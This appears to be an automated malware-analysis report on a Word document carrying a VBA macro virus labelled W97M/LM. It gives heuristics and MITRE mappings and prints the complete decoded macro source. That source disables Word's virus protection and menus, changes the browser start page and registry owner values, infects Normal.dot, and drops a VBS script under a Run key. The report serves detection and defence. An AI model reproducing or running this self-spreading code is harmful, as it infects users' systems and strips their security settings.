MALICIOUS
110
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample contains a VBA macro that executes upon opening the document. This macro attempts to set the Internet Explorer start page to a specific URL and modifies registry keys related to system protection and user information. The macro also attempts to disable security prompts and virus protection, indicating a malicious intent to compromise the user's system or redirect their browsing.
Heuristics 5
-
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Open "C:\Windows\System\LM.sys.vbs" For Output As #1 Print #1, "Set MW = WScript.CreateObject(""Word.Application"")" Print #1, "MW.Options.VirusProtection = (Rnd * 0)" -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.geocities.com/sir_dystyk/index.html� In document text (OLE body)
- http://www.geocities.com/sir_In document text (OLE body)
- http://www.geocities.com/sir_dystyk/index.htmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3885 bytes |
SHA-256: b24d4e7436d62e7dfb15e0c5745824bcfd38590f7ba267385d1d26d2b36c2413 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "LM Protection by SiR DySTyK?") <> "Yep !!" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\", "Start Page") = "http://www.geocities.com/sir_dystyk/index.html"
With System
.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOwner") = "SiR DySTyK"
.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOrganization") = "LVC"
End With
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Security\", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = (Rnd * 0)
Else
CommandBars("Tools").Controls("Macro").Enabled = (Rnd * 0)
CommandBars("Tools").Controls("Templates and Add-ins...").Enabled = (Rnd * 0)
CommandBars("Format").Controls("Style Gallery...").Enabled = (Rnd * 0)
End If
With Options
.VirusProtection = (Rnd * 0)
.SaveNormalPrompt = (Rnd * 0)
.ConfirmConversions = (Rnd * 0)
End With
With Application
.EnableCancelKey = wdCancelDisabled
.UserName = "SiR DySTyK"
.UserInitials = "SD"
.UserAddress = "W97M/LM >8)"
End With
If ThisDocument = ActiveDocument Then Set Infect = NormalTemplate Else Set Infect = ActiveDocument
Vx = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
Set Destination = Infect.VBProject.VBComponents.Item(1).CodeModule
Destination.DeleteLines 1, Destination.CountOfLines
Destination.AddfromString Vx
If Infect = ActiveDocument Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
Call RemoteInfect
End If
' W97M/LM: by SiR DySTyK [© 2000, LVC]
' Should spread under Word2000.
' God made him simple.
' Science made him God. - [ Lawnmower Man >8) ]
End Sub
Private Sub HelpAbout()
MsgBox "All I have to do is spread.." + Chr$(10) + " I WILL survive !! >8)" + Chr$(10) + Chr$(10) + " -SiR DySTyK-", vbInformation + vbSystemModal, "W97M/LM"
Dialogs(wdDialogHelpAbout).Show
End Sub
Private Sub RemoteInfect()
On Error Resume Next
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\", "") = "C:\Windows\System\LM.sys.vbs"
Open "C:\Windows\System\LM.sys" For Output As #1
Print #1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfDeclarationLines)
Close #1
Open "C:\Windows\System\LM.sys.vbs" For Output As #1
Print #1, "Set MW = WScript.CreateObject(""Word.Application"")"
Print #1, "MW.Options.VirusProtection = (Rnd * 0)"
Print #1, "MW.Options.SaveNormalPrompt = (Rnd * 0)"
Print #1, "MW.Options.ConfirmConversions = (Rnd * 0)"
Print #1, "Set LM = MW.NormalTemplate.VBProject.VBComponents(1)"
Print #1, "LM.CodeModule.DeleteLines 1, LM.CodeModule.CountOfLines"
Print #1, "LM.CodeModule.AddFromFile (""C:\Windows\System\LM.sys"")"
Close #1
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.